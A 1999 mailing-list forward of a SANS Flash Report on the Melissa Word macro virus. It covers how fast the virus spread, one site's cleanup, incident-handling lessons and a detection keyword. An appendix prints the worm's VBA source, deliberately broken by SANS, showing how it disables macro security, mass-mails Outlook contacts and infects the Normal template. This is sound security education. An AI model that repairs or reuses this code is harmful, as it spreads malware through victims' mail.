interesting-people message



Subject: IP: EXTRA: SANS Flash Report on the Melissa Virus (fwd)



>Date: Mon, 29 Mar 1999 13:14:36 -0800 (PST)
>From: Michael Dillon <michael@memra.com>
>To: farber@cis.upenn.edu
>Subject: EXTRA: SANS Flash Report on the Melissa Virus (fwd)
>Organization: Memra Communications Inc.
>
>
>This is an excellent summary of the Melissa virus event and shows how
>vulnerable Microsoft's Word and Excel and Access products are even at
>military sites. One point that wasn't made clear by the SANS author was
>that Microsoft has designed Word documents with a built-in virus carrier
>in the form of the AUTOEXEC macro. The same virus carrier is built into
>other Microsoft products and possibly other manufacturers as well. 
>
>Up until now the reaction to these sorts of security incidents has been
>focused almost solely on the identification of a specific attack and
>cleanup after the attack. But no mention is made of fixing the weakness
>that makes these attacks possible by completely separating data and
>programs so that it is not possible for naive users -- the majority of us
>-- to inadvertently run a program when our intention is merely to read a
>data file.
>
>Attacks like the Melissa virus make the news because they are designed to
>wreak havoc in a visible way. But how many more of these viruses are out
>there that are silently collecting data and then removing themselves from
>the system that they infected? This is where the real security problem
>lies and it appears that the US military is vulnerable to such an attack.
>
>--
>Michael Dillon                 -               E-mail: michael@memra.com
>Check the website for my Internet World articles -  http://www.memra.com        
>
>
>---------- Forwarded message ----------
>Date: Mon, 29 Mar 1999 15:33:06 -0500 (EST)
>From: sans@clark.net
>To: michael@memra.com
>Subject: EXTRA: SANS Flash Report on the Melissa Virus
>
>To:   Michael Dillon SD210249
>From: Rob Kolstad, SANS E-mail Concierge
>Re:   EXTRA: SANS Flash Report on the Melissa Virus
>
>Once or twice a year, the magnitude of a security event is great enough
>to merit a SANS Flash Report.  It is amazing and coincidental that it
>happens in the same 24 hour period that we send out the first SANS
>Newsbites.
>
>NOTE:  SANS will be changing email and web servers this week.  We hope
>to avoid service interruptions, but some error might creep in.  Problems
>to <kolstad@delos.com>.
>
>Table of Contents:
>  1.  What Melissa teaches us
>  1.1 Infection Speed
>  1.2 Collateral Damage
>  1.3 Need for Defense in Depth
>  2.  One site's experience in cleaning up after a Melissa infestation
>  3.  Conclusion
>  Appendix: Melissa Source Code
>
>You will already have heard of the Melissa virus, at least from the SANS
>Newsbites, and probably also from newspapers and friends, as well. An
>excellent description of the virus, including how to identify it and
>contain it at the host level, was developed by the Computer Emergency
>Response Team at Carnegie Mellon University.  This document is available
>at:  http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html .
>
>The major anti-virus vendors have already released descriptions and
>anti-viral signatures.  URLs for NAI and Symantec are listed below:
> http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp
> http://www.symantec.com/avcenter/venc/data/mailissa.html
>
>The rapid response of these organizations has been very impressive, and
>your response should be equally rapid.  If you have not yet taken the
>steps described in the CERT advisory, follow the instructions referenced
>above and get your site's virus signatures updated and the infected
>machines contained and cleaned.  Then read the rest of this document
>that tells some of the lessons learned and also the bigger picture
>surrounding the Melissa Macro virus.  We discuss the implications of
>information gathering viruses like Melissa, the process and impact of
>cleaning up after an outbreak at a military site and finally, share a
>non-working version of the code to help you understand what these viruses
>do.
>
>1. What Melissa teaches us
>
>1.1 Infection Speed
>
>According to NAI's web site listed above, the virus was first discovered
>on an "alt.sex" newsgroup and spread rapidly. On the same day the virus
>was first discovered "in the wild" it caused major infections and reports
>from a large number of Department of Defense and Department of Energy
>sites.  Many of you will probably find out today that your site has been
>infected as well.  This serves as a warning of how fast a virus with an
>unknown signature can spread.  A modified, non-operative copy of the
>source code is included as an appendix to this document.  If you search
>the listing for the string "For y = 1 To", you can see how the virus
>replicated so rapidly by going through Microsoft Outlook address books
>and sending itself to the first 50 entries in each book.  Sections in
>the code that have been the subject of news reports are marked with
>comments that begin with ***.
>
>Useful Background Information: In the March 2nd SANS First Tuesday
>Intrusion Detection Web Broadcast, archived at
>http://www.sans.org/webarchives.htm, Stephen Northcutt described another
>MS Word Macro Virus, M97.Marker.a.  Marker is an information gathering
>virus which uses FTP to send the Microsoft Office registration information
>of infected systems to outside organizations.  Northcutt described how
>this same technique would allow a prospective attacker to develop an
>infection map and by knowing who sends what to whom, to target future
>attacks.
>
>1.2 Collateral Damage
>
>The Melissa virus apparently does not create any other damage in the
>sense of deleting, or stealing files.  However, when the smoke clears,
>the cost of dealing with Melissa will be measured in the millions of
>dollars.  It also directly affects sites' ability to send and receive
>email.  One network engineer, who worked at one of the first sites to
>report the problem last Friday, March 26, said "I knew something was
>wrong before I knew what was wrong.  I could feel the network going
>slower and slower.  As I looked into it, I found the exchange mail
>servers were melting down." One of the lessons of Melissa is that a
>macro virus can hit very fast and very hard.  The engineer went on to
>say, "As I composed the last email of the day, a message hit the Inbox
>of my Microsoft Outlook email application.  The subject line read:
>"Important Message From [Jane Doe]".  I viewed the message, and the body
>read "Here is that document you asked for... don't show anyone else ;-)"
>Attached was a Microsoft Word document titled "list1.doc".
>
>"Although I hadn't requested any documents from [Jane Doe], I was
>expecting a couple of them from other people.  It wasn't inconceivable
>to think that she had become involved, even though I didn't know who
>she was.  I double-clicked on the Word document. A pop-up window appeared,
>warning me that a macro was contained in the document, and that macros
>can potentially be dangerous.  I knew that... :-)  So, I shut down the
>Word application, and checked the document with several of the virus
>detection packages that I had.  Everything appeared clean."
>
>"Since this was from someone in my organization, apparently a trusted
>source, I went ahead and opened the document with the macros enabled.
>In less than a second, a duplicate of the message had hit my mailbox,
>this time with my name attached. I hit the power-off button on my
>computer, but it was too late.  The payload had been delivered.  My name
>was now attached to a file containing pornographic web sites, and an
>apparent username and password for each site.  Moments later, duplicate
>messages from others who had made the same mistake began to appear."
>
>"At this point I knew we, as an organization, were in trouble. This
>virus (or worm) was snowballing fast, too fast.  I immediately called
>our information systems security manager, only to find that his phone
>was already busy.  I left a voicemail detailing my appraisal of the
>situation, and my fear that this incident could get serious... very
>quickly.  What I didn't know was that I was too late, it was already
>*very* serious."
>
>1.3 Need for Defense in Depth
>
>Though Melissa is primarily spread by e-mail, passing an infected floppy
>disk works just as well to move the virus to a new system, possibly even
>a new organization.  If there was ever any doubt about whether we need
>to take virus countermeasures seriously, that time is past.  We recommend
>virus scanning at the firewall, on servers, and on the desktop systems
>as well as physical entry points for magnetic media for sites that want
>to avoid the kind of punch Melissa exhibited.
>
>2. One site's experience in cleaning up after a Melissa infestation
>
>Here's a first-person description of the process one site used to clean
>up after being hit by Melissa.
>
>"As soon as we discovered the virus late Friday afternoon, we disconnected
>our servers (all SMTP relays and Exchange servers at our Internet
>connection) from the network until we could contain the infection. This
>happened at approximately 1800 hours Friday.
>
>"System administrators for both corporate and departmental Exchange
>servers worked through Friday night and well into Saturday. Many returned
>Saturday and again on Sunday to complete the isolation and cleanup. They
>cleaned up the Exchange servers with updated anti-viral signatures as
>soon as they were available. The corporate servers and one departmental
>server were ready to come back on-line late Sunday. We left IMS (Internet
>Mail Service) disabled until we could contain (filter) email at the SMTP
>server.
>
>"Our version of sendmail is one removed from the latest and filter
>updates provided by the author would not work on our version. We resorted
>to getting the word out for ALL users to update the AV signatures and
>refrain from sending Word docs until any with macros had been identified
>as coming from trusted sources. The administrator for the SMTP relay
>host downloaded a trial version of InterScan VirusWall from TrendMicro.
>For more info, see:  http://www.antivirus.com/products/isvw/index.htm
>
>"The clean-up picture would have been much bleaker if we hadn't had so many
>things in our favor:
>* System administrators were still at work when the problem started
>  (approximately 1640 on Friday).
>* Most of the users were gone for the weekend (and didn't compound the
>  problem by manually sending additional copies of the infected document).
>* All of the system administrators involved in the clean up had been trained
>  in incident handling based on the SANS' Incident Handling Step by Step
>  approach.
>* The person who needed to make key decisions was trained in incident
>  response and had already begun carrying a cell phone.
>* Base commanders recognized the expertise that was in use and supported
>  the Incident Handling team by not directing what needed to be done (at
>  least so far)."
>
>Note: The stages of incident handling are: preparation, identification,
>containment, eradication, and follow-up.  The URLs at the beginning of
>this document can help you with identification and eradication.  Your
>organization may need to consider email server down time in order to
>achieve containment.  You may also want to consider setting up non-email
>communication channels for your organization.  If you do not know how
>to build a telephone call tree, look for a "soccer mom".  They know how
>to spread important information very efficiently.  In this way, if you
>do suffer an email meltdown, you can still get important information,
>such as where to acquire the latest anti-virus software, to your users.
>
>3. Conclusion
>
>Because Melissa exploits one of the most valuable benefits of the net
>-- the ability to share documents -- to propagate and to multiply itself,
>it will affect far more people far more quickly than earlier viruses.
>The silver lining in this cloud is that a relatively benign virus like
>Melissa is a low-cost way of gaining user awareness.  That same mechanism
>can be used by a more malicious attacker to make private information
>public and to destroy large amounts of important data. It makes sense
>for you to use this opportunity to establish three capabilities if you
>have not already done so:
>(1) user responsibility and active involvement in protecting their
>    systems
>(2) an incident handling capability (Order Incident Handling Step-by-Step
>    from the SANS bookstore www.sans.org if you don't already have a roadmap)
>(3) user awareness of what to look for, whom to call, and what to say
>    when they call about a security threat.
>
>In addition, we at SANS want to hear your experiences and the lessons
>you learned in responding to Melissa. Please send your Melissa-related
>tips, tricks, techniques, experiences and lessons learned to info@sans.org
>with Melissa in the subject line.  This type of sharing can help all
>sites be in a better position to respond the next time an event like
>this occurs.
>
>Appendix: Melissa Source Code
>
>NOTE: Several errors have been introduced into this copy of the code as
>a safety measure. It will not run in this form.  We hope the code we
>changed will not overly impact your opportunity to understand how the
>software works, but we could not be responsible for furthering the spread
>of the live version of Melissa.  Text comments have been inserted at
>the "famous" locations preceded by three asterisks "***"
>
>*** Begins by checking security, the environment, and whether already
>infected
>
>Private Sub Document_Open()
>  On Error Resume Next
>  If System.PrivateProfileString("",
>       "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
>       "Level") <> "" Then
>    CommandBars("Macro").Controls("Security...").Enabled = False
>    System.PrivateProfileString("",
>       "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
>       "Level") = 1&
>  Else
>    CommandBars("Tools").Controls("Macro").Enabled = False
>    Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
>    Options.SaveNormalPrompt = (1 - 1)
>  End If
>
>Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
>Set UngaDasOutlook = CreateObject("Outlook.Application")
>Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
>If System.PrivateProfileString("",
>    "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <>
>    "... by Kwyjibo" Then
>  If UngaDasOutlook = "Inlook" Then
>    DasMapName.Logon "profile", "password"
>    For y = 1 To DasMapName.AddressLists.Count
>        Set AddyBook = DasMapiName.AddressLists(y)
>        Set BreakOffASlice = UngaDasOutlook.CreateItem(0)
>        For oo = 1 To AddyBook.AddressEntries.Count
>            Peep = AddyBook.AddressEntries(x)
>            BreakOffASlice.Recipients.Add Peep
>            x++
>            If x < 50 Then oo = AddyBook.AddressEntries.Count
>         Next oo
>         BreakOffASlice.Subject = "Important Message From " &
>              Application.UserName
>         BreakUmOffASlice.Body =
>            "Here is that document you asked for ... don't show anyone else ;-)"
>
>*** Here is the classic subject line "Important Message From" This could
>change of course in future versions ***
>
>         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
>         BreakUmOffASlice.Send
>         Peep = ""
>    Next y
>  DasMapName.Logoff
>  End If
>  System.PrivateProfileString("",
>      "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") =
>       "... by Kwyjibo"
>End If
>Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
>Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
>NTCL = NTI1.CodeModule.CountOfLines
>ADCL = ADI1.CodeModule.CountOfLines
>BGN = 2
>If ADI1.Name <> "Melissa" Then
>  If ADCL > 0 Then _
>    ADI1.CodeModule.DeleteLines 1, ADCL
>    Set ToInfect = ADI1
>    ADI1.Name = "Melissa"
>    DoAD = True
>  End If
>  If NTI1.Name <> "Melissa" Then
>    If NTCL > 0 Then _
>      NTI1.CodeModule.DeleteLines 1, NTCL
>      Set ToInfect = NTI1
>      NTI1.Name = "Melissa"
>      DoNT = True
>    End If
>    If DoNT <> True And DoAD <> True Then GoTo END
>      If DoNT = True Then
>        Do While ADI1.CodeModule.Lines(1, 1) = ""
>          ADI1.CodeModule.DeleteLines 1
>        Loop
>        ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
>        Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
>          ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
>          BGN = BGN + 1
>        Loop
>      End If
>      If DoAD = True Then
>        Do While NTI1.CodeModule.Lines(1, 1) = ""
>          NTI1.CodeModule.DeleteLines 1
>        Loop
>        ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
>        Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
>          ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(END, 1)
>            BGN = BGN + 1
>        Loop
>      End If
>CYA:
>      If NTCL <> 0 And ADCL = 0 And
>          (InStr(1, ActiveDocument.Name, "Document") = False) Then
>        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
>      ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
>        ActiveDocument.Saved = True
>      End If
>'WORD/Melissa written by Kwyjibo
>'Works in both Word 2000 and Word 97
>'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
>'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
>
>If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points,
>    plus triple-word-score, plus fifty points for using all my letters.
>    Game's over.  I'm outta here."
>
>End Sub
>
>*** The lines above are some of the most published information about
>this virus.  Though you can look for the virus with intrusion detection
>and other string matching security tools by searching for keywords like
>"Kwyjibo", simple modifications of the code could change these. ***



